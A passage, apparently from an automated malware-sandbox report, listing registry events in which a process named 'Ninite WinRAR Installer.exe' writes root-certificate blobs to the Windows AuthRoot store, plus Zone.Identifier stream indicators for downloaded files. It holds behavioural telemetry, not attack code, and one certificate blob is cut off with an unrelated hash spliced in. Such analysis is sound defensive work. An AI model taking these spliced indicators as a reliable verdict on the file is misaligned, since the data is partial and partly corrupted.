5e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Ninite WinRAR Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd1200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410	Ninite WinRAR Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 0400000001000000100000004fdd07e4d42264391e0c3742ead1c6ae0300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd17e00000001000000080000000080c82b6886d7017a000000010000000c000000300a06082b060105050703091d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a07f0000000100000016000000301406082b0601050507030306082b060105050703096200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf690b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520036000000090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff1190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 5c000000010000000400000000100000190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff153000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200360000006200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf697f0000000100000016000000301406082b0601050507030306082b06010505070309140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a01d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef7a000000010000000c000000300a06082b060105050703097e00000001000000080000000080c82b6886d7010300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd10400000001000000100000004fdd07e4d42264391e0c3742ead1c6ae200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410	Ninite WinRAR Installer.exe

NTFS ADS 11 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.zip:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Local\Temp\Rar$DRb4000.25227.rartemp\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.exe:Zone.Identifier	WinRAR.exe
File opened for modification	C:\Users\Admin\Downloads\Ninite WinRAR Installer.exe:Zone.Identifier	chrome.exe
